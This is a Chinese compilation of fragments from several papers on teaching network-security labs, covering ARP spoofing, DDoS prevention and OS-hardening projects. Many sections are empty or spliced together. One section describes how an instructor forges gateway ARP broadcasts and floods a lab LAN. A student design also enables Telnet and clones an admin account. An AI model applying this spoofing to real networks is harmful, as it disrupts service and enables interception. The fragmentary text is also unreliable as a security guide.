开篇:写作不仅是一种记录,更是一种创造,它让我们能够捕捉那些稍纵即逝的灵感,将它们永久地定格在纸上。下面是小编精心整理的12篇网络安全实训总结,希望这些内容能成为您创作过程中的良师益友,陪伴您不断探索和进步。
1.1校企共建实训教材
1.2搭建实训虚拟平台
1.4企业顶岗实训
1学生顶岗实训
2教师顶岗实训
深入企业第一线,了解企业网络所需要的工作岗位和技术能力,全面跟踪学习综合布线、网络应用操作、网络安全管理和网络云计算服务等方面的技术岗位;然后反馈到网络技术专业教学实践改革中,更新校企共建实训教材,将企业中的新知识、新技术和新的管理理念引入,做好与企业网络技术人员的良好沟通,丰富实训教材内容,提高教学质量。
关键词:网络安全;实验教学;教学设计;教学手段
1引言
网络安全课程本身原理部分晦涩难以理解,实验部分涉及技术众多,涵盖多个专业课程的知识点,因此也是一门与其他学科交叉性极强的实践性课程。根据学科特点和岗位能力培养目标,从基本学情出发,研究设计了符合教学目标和学生认知特点的教学方案,有效完成了教学任务,提高了学生的学习能力
2教学基本情况分析
网络的便捷带给用户很多网络使用效率的困扰,包括带宽拥塞、关键应用的服务质量QoS无法保障、病毒请求消耗带宽、网络攻击导致服务中断等问题。上网行为管理作为网络安全管理的重要内容,能够实施内容审计、行为监控与行为管理,同时可以动态灵活控制网络速率和流量带宽,很好地满足各行业网络安全管理的需要。
基于以上分析,教学目标确定为三方面。首先是知识目标。要求学生掌握上网行为管理的基本概念,熟悉上网行为管理常用设备,了解此类设备的关键技术,熟悉上网行为管理常用架构。二是技能目标,学生能够规划校园网络上网行为管理方案,能够实施上网行为管理方案,能够对常见设备进行运维管理及分析。三是素养目标方面,希望学生具备安全操作意识,有用良好合作协调能力、自我学习能力和创新和应变能力[3]。
3教学设计
3.1课前活动
3.2课堂活动
课堂教学部分,教师首先创设教学情境,设计出三个教学活动,引导学生分组讨论,完成实验环境的搭建,从而引出本单元学习内容;然后教师利用奥易课堂教学软件下发任务书,并做出简要说明。在学生完成过程中针对个别学生的提问做差异化指导,通过奥易教学软件统一监控。最后教师引导学生总结归纳本单元课堂教学的主要内容和实验思路、故障分析解决思路。
与此同时学生要完成一下工作。首先针对创设情境,分组讨论、展开头脑风暴并总结表述讨论结果,复习已有知识技能,独立完成实验环境的搭建;其次结合下发的任务书,组员间讨论分析项目的需求,检查项目实施的环境及准备工作是否完整。然后讨论制定项目计划,确定项目实施的方案;第三观看教学视频,独立完成9个任务的实施和验证;第四针对拓展任务,分组讨论,分析问题,提出解决方案,给出实施计划,确定实施方案;第五划分不同角色,组员间协作完成拓展任务的实施和验证;拓展任务结束后,其中一组简要汇报任务的完成情况,由师生对其共同点评;接下来学生结合教师给出的新的网络场景,分析总结出常见上网行为管理时有可能出现的网络问题,以及常见的分析和解决方法;最后独立完成课堂评价表的填写。
3.3课后活动
关键词:ARP欺骗攻击;网络安全意识;问题情境;职业素质
Abstract:Thispaperaimstointegratethenetworksafetyconsciousness,realproblemsituation,professionalqualityconceptintothecollegeexperimentalteachingprocessunderthestrategyofnetworkpower,tostimulatestudents'enthusiasmandinitiative,andguidestudentstofind,analyzeandsolvetheproblem,tosumuptheexperimentintheformoflists.Ultimately,the"studentoriented,supplementedbyteachers"teachingideasarereflected,andstudents'practicalabilityareenhanced.
Keywords:ARPspoofing;networksafetyconsciousness;problemsituation;professionalquality
2014年来,中央网络安全和信息化领导小组组长多次提出了“没有网络安全就没有国家安全”以及“建设网络强国”的重要论断。2015年政府工作报告提出的“互联网+行动计划”体现出信息化对网络发展巨大推动作用和以网络为载体的数据驱动巨大魅力的同时,也呼唤着人们通过网络的进一步发展来不断提升网络安全的能力和意识。两届国家网络安全宣传周活动的开展也为加强全民网络安全宣传教育、提升网民的网络安全防范意识和技能提供了良好的途径。
网络安全上升到国家战略层面,各类网络攻击和窃取事件的频发驱动信息安全需求急剧增加,目前网络安全普遍存在的问题是信息安全意识不强、缺乏整体安全方案、没有安全管理机制、系统本身不安全以及缺少必要的安全专才。
网络安全意识比技术更重要。作为培养网络专业技能人才的一线高校教师,在平常实验教学中除了借助各种安全设备和环境完成实训内容外,更重要的是提升学生的安全意识和处理安全事故的能力,在提高专业技能水平的同时培养学生的职业素质,因此设计好网络安全实验课程显得尤为重要。本文以ARP欺骗攻击与防范实验教学为例,探索在真实网络安全情境下,新型安全课程实验教学模式的改革以及教学效果。
2ARP欺骗攻击原理
ARP协议是以太网等数据链路层的基础协议,负责完成IP地址到硬件地址的映射。工作过程简述如下:1)当主机或者网络设备需要解析一个IP地址对应的MAC地址时,会广播发送ARP请求报文。2)主机或者网络设备接收到ARP请求后,会进行应答。同时,根据请求发送者的IP地址和MAC地址的对应关系建立ARP表项。3)发起请求的主机或者网络设备接收到应答后,同样会将应答报文中发送者的IP地址和MAC地址的映射关系记录下来,生成ARP表项。从ARP工作机制可以看出,ARP协议简单易用,但是却没有任何安全机制,攻击者可以发送伪造ARP报文对网络进行攻击。伪造ARP报文具有如下特点:伪造的ARP报文中源MAC地址/目的MAC地址和以太网帧封装中的源MAC地址/目的MAC地址不一致;伪造的ARP报文中源IP地址和源MAC地址的映射关系不是合法用户真实的映射关系。目前主要的ARP攻击方式有如下几类:仿冒网关攻击、仿冒用户攻击(欺骗网关或者其他主机)、泛洪攻击。
3问题情境设计
教学情境是课堂教学的基本要素,有价值的教学情境一定是内含问题的情境,它能有效地引发学生的思考。问题情境的创设,对于学生学习兴趣的激发起着决定作用。因此,如何设计具有一定情绪色彩的、以形象为主体的生动具体的场景,以激发学生一定的情感,就成为教学之初需要考虑的问题。
在一个没有防御的园区网中爆发的ARP病毒会造成网络丢包、不能访问网关、IP地址冲突等问题,实验室所有主机分配的是同一网段IP地址,接入交换机,预先在教师机上开启Sniffer嗅探者软件,运行数据包发生器,修改后的ARP广播报文会持续被发送到当前局域网中,为学生建立一个真实园区网面临的问题情境,接下来引导学生按照“发现问题-分析问题-解决问题”的顺序完成实验内容,提升自己的安全意识和实践能力。
4实施过程
4.1实验环境
实验室所有主机处于同一网段,类似如下所示的拓扑图环境:
4.2问题情境的构造
教师机IP地址为172.16.75.105,在本实验中充当攻击者身份。首先构造用于攻击的ARP欺骗报文,在Sniffer软件上定义好过滤器后,开始捕获报文,首先将教师机的ARP缓存清空,尝试PING网关,停止捕获并显示结果如下图所示,
发送当前的帧之前做如下修改:(1)更改源IP地址为网关IP地址;(2)更改源MAC地址为伪造的MAC地址11-22-33-44-55-66;(3)更改目的IP地址为任一同网段主机IP地址;(4)更改目的MAC地址为全F值。设置为连续不断地发送帧,启动数据帧发生器,此时当前网段会充斥着此类ARP广播报文。
4.3问题情境的呈现
以4-5人为一组,以真实的网络管理员遇到的企业局域网故障为案例,向学生说明经常受到的网络攻击来自于网络内部,表现为访问互联网时断时续,打开网页或下载文件的速度明显变慢,甚至无法访问公司的Web服务器等资源,严重影响了企业办公业务的正常运行,公司领导对此很不满意,要求立刻彻底解决问题。要求在实验报告上完成每步测试内容并填写检查结果。此环节注重引入职业教育理念,既要注重技能锻炼,又要注意素质培养。立足本职岗位,敢于承担责任,从工作中发现问题是什么,为什么到怎么做,同时培养学生的团队意识。
4.4发现问题
此环节旨在让学生运用已掌握的网络维护技能发现当前局域网存在的问题,通过观察学生在测试环节中采用的方法,可以了解到学生能否快速有效地定位网络中的故障,在不投入新的设备情况下解决问题。
通过观察,多数学生会按照如下测试步骤检测网络状况:1)检查本机网络连接情况及IP地址是否有效;2)检查与同一网段内其余主机连接情况;3)检查与网关连接情况;4)检查与DNS服务器连接情况;5)检查与Web服务器连接情况。这一过程旨在帮助学生基于收集到的测试数据判断问题症结点的能力,只有在充分调查研究的基础上具体问题具体分析,才能把存在的问题症结点找准、找实、找透,才能开对方子,做到对症下药。
4.5分析问题
根据课堂反映来看,绝大多数学生在实施到第3步时发现PING网关IP地址不通,并且重启机器后症状依旧,没过多久又会产生丢包现象。不少学生通过使用ARP-a命令发现学习到的网关MAC地址是伪造的11-22-33-44-55-66,进而判断出问题在于网关MAC地址被篡改,通过使用Sniffer软件,可以嗅探到局域网内充斥着大量的ARP报文,并且通过抓包分析,发现源IP地址为172.16.75.254的网关的MAC地址为11-22-33-44-55-66。此时需要引导学生去思考两个问题:一是为什么主机会无条件更新,二是如何防范此类错误。结合课本上提到的TCP/IP协议栈的脆弱性,部分同学会得出主机并不对收到的ARP报文进行检查,从而导致PC主机更新本机ARP缓存里的网关MAC地址的结论。
这个分析问题的过程注重培养学生遇到问题的应变能力,这种能力的训练对于今后可能从事的网络运维岗位而言,是非常有必要的。
4.6解决问题
4.7实验总结
总结既是自己对于实验的理解归纳,也是对整个实验过程的回放,既要总结有所收获的地方,也要归纳出不足之处。通过将实验全过程中涉及现象、情境及步骤列成问题清单,让每位学生都能从实验中总结出得与失。最后借鉴翻转课堂的思想,邀请一位学生就实验目的、方法、步骤进行口头陈述,由其余学生进行补充,从而获得更深层次的理解。
5结语
参考文献:
[1]迟恩宇,刘天飞,杨建毅,王东.网络安全与防护[M].电子工业出版社,2009.
[2]叶成绪.校园网中基于ARP协议的欺骗及其预防[J].青海大学学报:自然科学版,2007(3):59-61.
[3]秦丰林,段海新,郭汝廷.ARP欺骗的监测与防范技术综述[J].计算机应用研究,2009(1):30-33.
[4]孟令健.计算机网络安全ARP攻击行为的防范研究[J].齐齐哈尔大学学报:自然科学版,2013(3):9-11.
[5]郭会茹,杨斌,牛立全.ARP攻击原理分析及其安全防范措施[J].网络安全技术与应用,2015(6):5-6.
[6]刘名卓,赵娜.网络教学设计样式的研究与实践[J].远程教育杂志,2013(3):79-86.
摘要:针对当前计算机网络教学和目前中等职业技术学校计算教学的现状,结合当前计算机网络技术的发展和实际状况,结合中等职业技术学校的学生特点,综合网络实际使用和培训的状况,对计算机网络教学进行详细的分析和研究,尝试寻找到一条适合中职计算机网络教学方式,行成一套行之有效的教学方法。关键词:中职计算机教育计算机网络技术网络教学中图分类号:G712
文献标识码:A
【关键词】项目化教学;计算机网络技术;项目设计;应用
一、项目化教学法的含义
二、《计算机网络技术》课程教学目标
本课程的教学目标是使学生掌握计算机网络基础理论及网络组建技术,掌握目前应用最广泛的TCP/IP协议的基本知识,会组建小型局域网,会安装、配置常用的网络服务,能为各种常用的网络服务提供技术支持,能管理小型网络,对在网络运行过程中出现的故障进行排除和解决,能保证网络安全稳定的运行。要想实现这一教学目标,必须深化改革,采用有效的教学方法——项目化教学,让学生在项目学习中具备局域网组网与管理的能力。
三、《计算机网络技术》课程采用项目教学法的必要性
(1)目前在计算机网络技术课程教学中存在理论和实践相脱节的现象。教学内容理论性太强,一般教师在讲授计算机网络课程时更多的是采用传统教育管理和教学模式。首先,对计算机网络的概念、发展、硬件组成等内容进行介绍;其次,介绍OSI七层模型、TCP/IP协议、各种网络的功能;最后,介绍网络的应用与网络安全的防范等知识。这种传统的教学模式看起来教师已经把计算机网络知识全部传授给了学生,但对于学生来说如何管理和维护一个网络仍无从下手,学生对计算机网络的认识只停留在书本上。(2)教学手段和方法单一,教学效果不好。教师在讲授计算机网络课程的过程中,最容易犯的毛病就是“满堂灌”。内容理论性强,相对枯燥,学生看不到又摸不着,很快会对计算机网络从感兴趣到失去兴趣,这会直接导致学生上课走神、不听课、教学互动差,达不到教学效果。针对平时教学中存在的问题,我们进行教学改革,改革教学手段和教学方法,把项目教学法引入网络技术课堂中,可大大地激发学生的学习热情,使理论学习与岗位实践需求统一起来。
四、项目教学法在《计算机网络技术》课程中的实践应用
五、结语
《计算机网络技术》课程是内容多,范围广,知识更新快,且理论性和实践性都很强。作为教师,我们必须紧贴网络实际情况,设计典型实用的项目,从真实的网络应用入手讲解网络的组建、应用、管理和维护,提高学生分析问题、动手能力和解决实际问题的能力。只要把项目教学法用好用活,学生就会感到学这门课程是非常有用的,会积极地投入到项目学习中去,更好地实现既定的教学目标。
参考文献
关键词说课信息安全教学课程
中图分类号:G424文献标识码:A
0引言
1课程定位与目标
1.1岗位需求(如图1)
1.2课程定位
信息安全基础是高职高专3年制信息安全专业的一门必修职业基础课程,一般安排在第一学期开设,在专业课程体系中起着引领专业课程体系的作用,其后续课程为安全防护工具、服务器安全防护和防火墙配置应用。
1.3课程学习目标
(1)学习能力目标。通过本课程的学习,进一步培养学生的自主学习能力,掌握网络安全防护的基本过程和方法。
(2)职业能力目标。了解我国网络安全状况和相应的政策和法律法规,熟悉网络安全防护项目的实施过程和要领,能够熟练进行客户机和服务器加固操作,能够设计和实施中小型网络的安全防护方案,了解大型网络安全防护方案的设计与实施要领。
(3)职业素养目标。通过项目设计培养学生的统筹规划能力和工程文档编写能力,通过项目合作培养学生的团队合作意识和能力。
2课程设计
3教学内容和组织
3.1教学内容选取
根据当前网络安全项目的规模,可将网络安全防护客户划分为普通网络用户(ADSL接入)、中小型网络和大型网络,由此根据教学单元设计内容涉及信息安全基础知识、信息系统安全体系、信息加密技术和网络安全实用技术方面来确定网络安全防护学习领域的学习情景如图2。
3.2教学内容子情境设计组织
(1)普通网络用户安全防护学习子情境设计如表1。
(2)中小型网络安全防护学习子情境设计如表2。
(3)典型校园网全防护学习子情境设计如表3。
4教学组织实施与重点难点
4.1教学组织实施
在整个教学过程中,学生一般以小组的形式进行工作学习。在任务工作过程系统化设计情境学习中,要求每个小组选出一名同学担当组长,组长的职责是负责全队的组织协调,分配任务,组织讨论,提交实践报告,成果演示录像呈现,给其他组员评分等。
在具体实施教学过程中,本课程组把基于工作过程教学模式中的六步行动过程总结为教学中的四个环节:任务明确、教师示范、学生实践、展示评价。在这四个环节中,分别把握学生应该掌握的知识和任务,顺利完成教学和对学生的训练。
4.2教学重点
普通网络用户安全防护方案的制定与实施:由教师首先讲解并演示WindowsXP的安全防护操作,学生先学后做;教师指导学生进行Vista安全防护方案的设计与实施,学生边学边做;教师组织学生自主进行Windows7安全防护方案的设计与实施。
中小型典型网络的安全防护方案的制定与实施:由教师讲解典型网站安全防护方案的设计与实施,学生先学后做;教师指导学生进行典型网吧安全防护方案的设计与实施,学生边学边做;教师组织学生自主进行典型企业网络安全防护方案的设计与实施。
4.3教学难点
网络安全防护工程方案的设计与实施:通过WindowsXP、Vista、Windows7、典型网站、典型网吧和典型企业网络安全防护方案的设计与实施,掌握一般网络安全防护方案的设计与实施。
5课程考核标准与教学效果
6教学队伍
本课程教学团队现授课教师有7人,专业学术带头1人,专职教师中副教授2人,讲师3人,助教1人;其中具有硕士学位2人,在读硕士3人,“双师素质”教师达100%以上;网络架构工程师1人共同实施;达到理论实践的紧密结合,理论支撑实践操作的提高,实践技能验证理论的指导。在教学活动中,教师和学生相互学习,共同提高。本课程在建设过程当中逐步形成了一支学历、职称结构合理、师资配置完善、梯队建设良好、结构比例相对稳定的教学队伍。
7教学改革创新与努力方向
7.1教学改革创新
本课程采用校企合作、“教-学-做”一体化的教学模式。由本院与蓝盾股份有限公司紧密合作,组建蓝盾信息安全实验室,为“教-学-做”一体化教学提供了非常好的条件。
教学内容改革:教学内容与岗位工作内容的一致性。
本课程采用:模块课程模式项目(任务)课程模式活动课程模式工作过程系统化课程模式。
考核方式的改革创新
7.2努力方向
完善教学课程内容,探索新的教学手段;建立题库迎合学生考取认证;丰富项目案例资源不断改进教学方法;进一步完善师资队伍结构,培养并形成一支教学水平高、专兼结合的高素质教学队伍。
8结语
目前,职业教育正处于日新月异的课程改革过程中,努力提升高职教育教学理念,创新体制机制,突出实践教学,深化课程改革,更新教学手段,课程说课作为现代高职教学改革的新课题、教学研究工作的新形式进一步彰显实践教学特色,必将成为推动我国高等职业教育发展的新动力。
[1]穆惠英.高职《环境监测》课程说课设计.中国科教创新导刊,2008.11.
[2]秦毅,齐欣.《平面处理技术》课程说课设计案例.电大理工,2011.3.
[3]陈丽,伍善广.高职高专《药剂学》.海峡药学,2011.23(8).
[4]秦爱梅.高职院校《3dsmax》课程说课设计.计算机光盘软件与应用,2012(12).
关键词:操作系统安全;工作场景;实训教学
1工作场景模拟教学法
1.1教学法的内涵和特征
工作场景模拟教学法[3]是在教学过程中,使用一种近似于实际工作的真实场景,模拟工作中可能发生的真实事件,再现工作真实过程的情景和环境,让学生按照工作流程,在各工作场景中扮演接近真实身份的角色,通过场景中的一些情节,体验和理解其扮演角色的作用、工作内容等,从而理解教学内容,达到“寓教于景”教学目的的教学方法。
工作场景模拟教学法由以下几个特征:1)实践性强。能为学生提供一个接近真实的工作场景,在工作环境中体验学习,将理论知识和实际操作应用于项目,在工作中能充分表现自己的才能,发挥创新潜能,从而增强对实际问题的预测与处理能力。2)动态性强。在教学中,学生是活动的主体,教师只起组织指导作用。3)交互性强。表现在学生之间对项目规划讨论,学生与教师的主动交流,有利于知识的传递和思想的集中。4)协作性强。项目由小组共同完成,有利于创设和谐的学习氛围,培养学生团队合作能力。
1.2教学法的迫切性
2操作系统安全实训课程设计与组织
1)第1阶段。
根据实际情况以5~6人为单位进行分组,成立项目组推选出组长(项目经理),成立以教师为领导、各项目经理为成员的临时评审团。同时,教师公布事先准备好的几个公司的项目需求(以类似于招标书的形式于内网服务器)供学生选择(图2给出其中1个中型企业的项目需求)。
公司背景:
绍兴XX公司是一家年产值上亿的中型企业,总部在绍兴市区,有多家子公司分布在上虞、诸暨等地,公司网络曾经发生过几次网络安全事件,给公司带来了一些经济损失,公司决定增加网络安全投入,提高网络安全管理水平。
具体需求:
1.用一个虚拟机模拟公司总部,一个虚拟机(或者是主机)模拟子公司或外地出差人员。
2.总部和子公司需要使用VPN通信(为了保证信息的安全防止中间人攻击,采用IPSEC来保证隧道的安全性)。
3.公司总部的Web、Ftp等服务器对内网用户开放。
4.公司内部不同部门不同职位所具有的权限不一样。
图2某中型企业的需求
2)第2阶段。
项目组提出设计方案,图3给出某项目组对上述需求的设计方案,然后制定项目计划,再由项目经理对项目进行划分(提交教师审核),最后下发任务给项目成员。在实训室中尽可能的模拟真实的工作环境和条件,完成项目设计方案的内容,测试人员同步跟进,及时记录测试清单,教师巡回指导,碰到共性问题集中讲解,包括对部分理论知识的讲解。在开发过程中严格控制工作进度,各小组“下班”前,提交每天的开发日志(模板如图4),明确当天的进度完成程度,如未按计划完成则给出理由和解决方法。项目经理按时向教师汇报小组情况,以便教师掌握项目的实施进度。项目实施完成后,小组之间进行交叉测试,检查是否全部实现项目所要求的内容及其实用性、可操作性、效率等,并及时进行修正。最后,撰写竣工报告和项目汇报的PPT。
某小组作为网络安全公司,为该中型企业设计的安全管理方案,实现以下安全要求:
1.子公司可以通过IPSEC安全方式构建VPN隧道技术。
2.为了防止黑客通过445端口在局域网中轻松访问各种共享文件夹或共享打印机,故在总部关闭445端口,开始开启TELNET服务。
3.公司总部为经理、技术总监、普通员工,分配不同权限的账号,经理具有管理员权限,是管理员组的一员;技术总监是和普通员工都是普通账号;公司改革,经理兼任技术总监,故希望技术总监账号克隆经理账号,共享其所有权限。为了节约磁盘空间,对普通用户设置磁盘配额,每人只能使用350M的空间,超过200M发出警告,而所有普通员工自己增加的文件和文件夹都要用EFS加密,并导出其密钥。
4.公司规定所有账号都不得采用弱密码,开启复杂性要求、设置最小密码长度为6、密码最长留存期为30天。
5.公司为了实现信息公开化,信息共享,创建了Web、Ftp两个服务器,并设置了DNS,方便域名访问。对于Web站点公司希望实现一个站点对应两个IP地址(因为公司地址将有电信、网通的,而暂时只有电信的,为了防止环路,要求在同一张网卡下配置多个IP地址),同时希望隧道用户才能访问站点,并限制带宽为5M,连接数为50。同时Ftp服务器实现匿名访问,只允许隧道用户访问,限制连接数量为25,要求能读写。
图3某中型企业的设计方案
项目名称组号
项目组成员
每名同学的工作内容
01020304
是否完成
进度
遇到的问题及解决方法
工作心得
参考资料
图4项目开发日志
3)第3阶段。
生提交的工作成果,参照项目进度计划和项目需求,确认总结学生的阶段工作成果。教师对小组的整体设计以及在实训中的问题进行评析,公布相应成绩。最后由学生和老师共同评选出最佳项目组。
3教师在模拟过程中的作用
在整个工作情景模拟过程中,教师的位置应处于辅助地位,学生是主角,教师协助各开发小组完成实训任务。
1)明确角色和任务。引导每个学生明确自己的角色和任务,提醒和引导学生成功扮演相应角色,起到一个导演的作用。
2)跟踪监控工作过程。跟踪项目规划设计实施的全过程,通过旁听讨论会、检查记录,及组长的进度汇报来监控小组的方向;检查开发日志监管系统质量和进度;检查考勤情况,监控遵守和执行规章制度的情况;通过评审监控最终系统的效果和质量。
3)指导和帮助。在第1阶段,负责为学生提供各种文献资料或查阅文献资料的途径,帮助学生制定调查问卷和讨论主题,提供规划设计及投标书的规范说明,并根据讨论会记录和需求规格说明,给出建议和意见。在第2阶段,帮助解决学生未能解决的问题。在第3阶段,帮助学生规范测试过程和测试报告的书写,参与评审答辩,帮助学生完善系统功能和性能。
4)评价。观察每个学生在工作过程中的表现,包括出勤、工作态度、参与情况、工作量,通过评审其所负责部分的系统设计和开发质量,以及各阶段的小组成绩,给出每个学生的总体评价或总评成绩。
4结语
参考文献:
[1]姜大源.当代德国职业教育主流教学思想研究:理论、实践与创新[M].北京:清华大学出版社,2007:50-100.
[2]钱宇虹.基于工作过程的高职软件项目开发综合实训开发探索[J].计算机教育,2008(20):175-178.
[3]闫乐林,蔡平胜,元莱滨.场景模拟教学法在“计算机网络”课程中的应用研究[J].计算机教育,2009(18):116-118.
[4]柴巧叶.基于“中小型网络构建与管理”的项目教学的探索与实践[J].计算机教育,2009(22):132-134.
ResearchonOperatingSystemSecurityTrainingBasedonWorkingScenarioTeaching
DUHuan-qiang,YUANSi-da,CHENJun
(DepartmentofComputerScience,ZhejiangIndustryPolytechnicCollege,Shaoxing312000,China)
一、计算机网络专业面向工程的教学改革思路
针对不同阶段的实验教学确定不同的任务定位。院定必修课着眼于提高学生的科学素质与人文素养,以培养学生的基本实验技能、科学的思维能力和创新意识为主要教学目标。系定必修课和专业方向课及实践教学着眼于对学生进行工程技术人员的基本训练,以培养工程实践能力和创造能力为主要教学目标。
针对传统的专业实验课与工程严重脱节的状况,实行专业实验课的工程化,即系定必修课程及实验课要面向工程,要紧紧围绕工程和联系工程进行。
针对传统的专业实验基本都是验证性实验的状况,增设综合性、设计性和创新性实验,以培养学生的创新能力和综合实践能力。
针对传统的专业实验课从属于理论课的状况,实行独立设置的实训课程和单独考核。在进入毕业实习前,进行一次网络工程综合实训,这一独立设置的实训课程名为网络集成技术,它涉及网络技术的所有方面,并可通过专业实验室实施。
针对高等职业院校只局限于校内教学活动的情况,实施“走出去、请进来”的面向工程的授课方式,加强校内外实习实践基地建设。
二、计算机网络专业面向工程的实践教学体系
建立面向工程的实践教学体系是一个复杂的系统工程。该体系包含三个部分:课程体系及内容、网络实践体系(实验、实训和实习)、网络工程应用。在该体系中,要始终以网络工程应用为最终目标,建立课程体系、整合课程内容,设置层次网络实践体系;课程体系及内容服从、服务于网络实践;网络实践容服从、服务于网络工程应用。
1.建立面向工程的课程体系
从应用型人才培养的全局来看,当前课程改革的主要任务是重新审定、合理调整总的课程设置。在计算机网络专业中,减少专业必修课,按照计算机网络、网络工程、网络管理与安全和网络软件开发4个方向增加选修课。明确每门课程在培养计划中的地位与作用,增加综合素质养成需要的宏观性课程,充实新兴的高科技应用成果。
课程改革不仅要以就业岗位群对人才知识结构的要求为依据,建立模块化的课程体系,而且要改革课程内容设置,打破课程的界限,根据高职计算机网络教学的实际,进行课程内容的整合与拆分,提高课程教学的效果和质量。
调整网络专业系定必修课和实验课的教学方式,将实验、实训、实习等实践性课程与理论教学有机统一起来,面向工程应用实施教学计划,重点突出知识的应用性和实践性。
2.建立面向工程的网络实践体系
面向工程的实践教学体系包括实验、实训和实习三个部分。实验基于网络基础理论知识,进行基本技能的培养。实训主要锻炼学生对网络工程的整体规划、设计和创新能力。实习要求学生走出校园进入企业锻炼,在实际网络工程项目实践中进行锻炼,总结经验、教训,提高综合设计创新能力。其中,实验是工程实训的基础,实训又是实习的基础,这三者之间关系是逐层深入的,从而形成了系统而有层次的实践教学体系。
(1)实验项目的设计。按照实验教学方式,实验教学分为以下几种形式:验证性实验、综合性实验、设计性实验和研究创新性实验。过去在教学过程中,多以验证性实验项目为主,各任课教师需要进一步优化设计课程实验方案,适当精简验证性实验,增加综合性实验和设计性实验比重。实验教学做到精讲多练。
(3)网络工程实习。实施“走出去、请进来”的面向工程的授课方式。建立校企培养模式,使学生即学即用,了解网络技术及施工特点和规范,激发学生的学习兴趣,达到了传统教学方式所不及的效果。同时,聘请一批网络工程和网络开发第一线的工程技术人员,定期到校进行课程教学和开设讲座,让学生了解到网络技术新发展、新工艺,通过讲课和讲座,提高学生对专业实践能力的重视程度。
3.面向工程的网络实验、实训平台的设计
面向工程的网络实验、实训平台应提供真实的网络环境,可以让学生亲自动手完成实验实训项目,加深对网络原理、协议、标准的认识,从而提高学生的网络技能和实战能力。因此,网络实验实训平台的建设尤为重要。根据实验台功能的不同,分为基础实验台、安全试验台、无线试验台和VoIP实验台。每种试验台由实验需要的硬件组成,包括路由器、核心交换机、三层交换机、二层交换机、防火墙、工作站、服务器、无线AP、VoIP语音模块等。该环境有很强的适应性,根据不同的实验实训要求,可以配置不同的基础平台,如软件开发平台可以直接提供路由和DNS环境,网络安全实验台则可提供完全的Internet技术环境。该平台可以实现计算机网络、网络工程、网络管理与安全和网络软件开发4个方向的所有实验实训项目。实现了理论的实验化、实验的工程化、工程的系统化、系统的集成化。
4.实验、实训成绩考核与效果评价
关键词:校园网;DDoS;防范;措施
CampusNetworkDDoSAttackPreventionMeasures
ZENGXiao-jie1;ZHOUZai-hong2
(1.LoudiVocational&TechnicalCollege,Loudi417000,China;2.GuangdongMedicalCollege,Dongguan523808,China)
Abstract:ThecampusnetworkinCollegesanduniversitiesbecauseofsomeinherentproblemsofitsowndevelopment,makeitvulnerabletotheattackofvarioussecuritythreatssuchasDDoSetc..Inthispaper,theauthorthroughtheobservationandanalysisofthecampusnetworkformanyyears,thecampusnetworkDDoSattackpreventionmeasures,andachievedgoodresults.
Keywords:campusnetwork;DDoS;prevention;measures
近年来,高校教育信息化出现迅猛发展的态势,高校校园网出现了新的建设,新设备、新技术不断涌现。可是,由于网络的开放性以及日益泛滥的病毒和攻击工具,校园网的安全问题日益凸显,如计算机病毒、拒绝服务、网络漏洞、网络资源滥用等校园网络事件不断出现。分布式拒绝服务攻击(DistributedDenialofService―DDoS)是互联网安全的严重威胁[1],在校园网内也时有发生,对校园网造成了很大的后果,严重影响了学校正常的教学、科研、管理工作的顺利开展。该文从校园网安全状况的角度,分析了DDoS攻击方式和简单判定方法,并总结了校园网防范DDoS攻击的一般性措施。
1校园网络安全现状
高校校园网络的建设,一般建成了核心、汇聚、接入三个网络结构层次,核心节点间的互联链路,核心节点与汇聚节点间的互联链路以及汇聚节点的设备间组成的网络为骨干层,其他部分为接入层。高校校园网核心层和汇聚层一般采用了Cisco、H3C、华为、锐捷等主流厂商的高端设备。各种安全设备也大量使用,如IPS,流量检测清洗设备、防DDoS防火墙等。校园网管理部门则负责校园网的建设,包括规划、设计、实施以及业务维护。这样的网络结构和设施使对加强校园网络安全有了较好地基础,但校园网在网络安全上有独特的特点,这些特点决定了校园网会受到来自于学校内外的各种网络安全问题的威胁[2]:
1)校园网硬件设施投入大,用户数多,一旦出现网络安全问题,在校园网络中会迅速蔓延,后果严重。但校园网的建设和管理通常对网络安全重视不够,管理投入明显不足,这样就造成了对校园网络安全管控的力不从心。
2)校园网中的应用系统软件盗版严重,存在网络安全漏洞,如木马和后门等,给校园网络安全造成很大隐患,网络入侵就乘虚而入。
3)来自校园网内的安全威胁不容忽视。大学生这一活跃的用户群体好奇心强,特别是对黑客技术感兴趣,经常尝试使用各种黑客技术进行恶作剧般的网络攻击,这些出于好奇的非恶意攻击,是对校园网安全的很大的考验。
4)由于校园网开放的网络环境决定了校园网络的管理也是宽松的。为保障校园网络资源的充分共享及应用的方便,校园网络中一般不会有过多的网络限制措施,甚至校园网中各种安全技术及措施也没有进行有效的配合,安全设备设施不能发挥其最大的作用。
由此可见,校园网从管理和应用上存在很多的问题,这些问题的存在使校园网络受到DDoS攻击越来越容易。
2判断校园网DDoS攻击的简单方法
DDoS攻击也称之为“洪水攻击”,它利用TCP/IP协议的漏洞,通常采用几百台甚至几千台分布的主机并发地对单个或多个目标进行攻击,消耗目标主机或目标网络的资源,从而干扰或完全阻止为合法用户提供服务[3]。
针对校园网络安全独有特点,校园网DDoS攻击一般表现出两种形式:流量型的DDOS攻击和资源耗尽型的DDoS攻击[4]。在攻击发生时,对校园网络带宽或主机,利用大量的DDoS攻击数据包致辞使网络带宽被阻塞,或消耗主机的内存,或占用CPU应用程序,从而无法提供正常的网络服务。
如要进一步确认主机服务器是否遭受了DDoS攻击,有一种简单的测试方法,就是用Ping命令来测试。若对主机突然Ping不通了或丢包严重,则可能遭受了DDoS流量攻击,还可以Ping连接在同一交换机上的主机服务器,若也不能正常访问,就基本可以断定该主机遭受了DDoS流量攻击。而对于校园网内的资源耗尽型DDoS攻击的判断则更简单,如Ping主机时突然发现主机访问很慢甚至不能访问了,但还可以Ping通,则很可能遭受了资源耗尽型DDoS攻击。还有Ping自己的主机不能Ping通或严重丢包,但Ping同一交换机上的其它主机服务器则正常,这就说明主机遭受DDoS攻击后而占用主机CPU,造成主机无法回应Ping命令。这种情况下,网络带宽还是有的,否则就Ping不通同一交换机上的其它主机了。
3DDoS攻击防范措施
校园网要防御DDoS攻击,要从校园网络设施、网络安全策略设置及网络管理等多方面考虑其防范措施。
